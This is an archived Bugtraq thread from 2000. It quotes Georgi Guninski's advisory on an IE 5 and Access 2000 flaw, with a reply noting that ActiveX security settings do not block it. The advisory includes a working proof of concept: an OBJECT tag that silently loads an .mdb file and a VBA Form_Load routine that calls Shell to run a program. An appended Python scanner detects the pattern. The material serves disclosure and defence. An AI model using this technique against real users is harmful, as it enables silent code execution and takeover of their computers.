Bugtraq mailing list archives
Re: IE 5 and Access 2000 vulnerability - executing programs
From: paul.rogers () MIS-CDS COM (Paul Rogers)
Date: Wed, 28 Jun 2000 09:24:18 +0100
And as an extra point to this alert, if you have the security option "Run ActiveX controls and plug-ins" set to prompt or disable, the code will STILL execute.

If you have this option set to prompt, the dialog box will appear after the OBJECT tag has been executed and if you have this option set to disable, the warning dialog box will again appear after the OBJECT tag has been executed.

Haven't tested this with PP2000 and Excel 2000 yet (I will do in a tick), but I assume the same bug will occur.

Cheers,

Paul Rogers,
Network Security Analyst.

MIS Corporate Defence Solutions Limited

Tel: +44 (0)1622 723422 (Direct Line)
     +44 (0)1622 723400 (Switchboard)
Fax: +44 (0)1622 728580
Website: http://www.mis-cds.com/
-----Original Message-----
From: Georgi Guninski [mailto:joro () NAT BG]
Sent: 27 June 2000 12:43
To: BUGTRAQ () SECURITYFOCUS COM
Subject: IE 5 and Access 2000 vulnerability - executing programs

Georgi Guninski security advisory #14, 2000

IE 5 and Access 2000 vulnerability - executing programs

Systems affected:
IE 5.01, Access 2000, Win98 - probably other versions, have not tested

Risk: High

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other versions are also vulnerable) allow executing programs when viewing a web page or HTML email message - (in the latter case with IFRAME). This allows taking full control over user's computer.

Details:
Access 2000 allows executing VBA code which has access to system resources and in particular executing files. It is possible to silently open and execute .mdb file from IE with the code:

<OBJECT data="db3.mdb" id="d1"></OBJECT>

This allows executing VBA code from Access 2000, though it is not visible to the user.

The code is:
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
    Dim stAppName As String
    stAppName = "C:\Program Files\Accessories\wordpad.exe"
    MsgBox ("Trying to start: " & stAppName)
    Call Shell(stAppName, 1)
Exit_Command0_Click:
    Exit Sub
Err_Command0_Click:
    MsgBox Err.Description
    Resume Exit_Command0_Click
End Sub
---------------------------------------------------
Form1 is automatically opened at database startup.

Demonstration is available at:
http://www.nat.bg/~joro/access.html

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro
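A defensive check for the pattern described in the advisory, as an added example that is not part of either original post: it scans an HTML page or mail body for OBJECT tags whose data attribute points at an Access database, and lists IFRAME sources that need the same scan. The function and class names, the extension list and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Assumption: only .mdb is listed because it is the only type the advisory tested.
RISKY_EXTENSIONS = (".mdb",)


class ObjectDataScanner(HTMLParser):
    """Collect OBJECT tags whose data attribute points at a risky file type."""

    def __init__(self, extensions=RISKY_EXTENSIONS):
        super().__init__(convert_charrefs=True)
        self.extensions = tuple(e.lower() for e in extensions)
        self.findings = []  # (line, kind, url)

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so OBJECT/DATA match.
        attrs = dict(attrs)
        line = self.getpos()[0]
        if tag == "object":
            url = (attrs.get("data") or "").strip()
            try:
                path = urlsplit(url).path
            except ValueError:  # malformed URL: fall back to the raw value
                path = url
            # Compare the decoded path only, so "?v=2" or "%6Ddb" cannot hide it.
            if unquote(path).lower().endswith(self.extensions):
                self.findings.append((line, "object-data", url))
        elif tag in ("iframe", "frame"):
            # The advisory's e-mail variant goes through an IFRAME, so the
            # framed document has to be scanned as well.
            src = (attrs.get("src") or "").strip()
            if src:
                self.findings.append((line, "frame-to-scan", src))


def scan_html(html, extensions=RISKY_EXTENSIONS):
    scanner = ObjectDataScanner(extensions)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample input; db3.mdb and access.html are the names used in the advisory.
SAMPLE = """<html><body>
<OBJECT data="db3.mdb" id="d1"></OBJECT>
<object DATA='files/Report.MDB?v=2'></object>
<object data="logo.png"></object>
<iframe src="access.html"></iframe>
</body></html>"""
```

Because the follow-up reports that the "Run ActiveX controls and plug-ins" prompt appears only after the OBJECT tag has been processed, a finding here is a reason to strip or quarantine the content before it reaches the client.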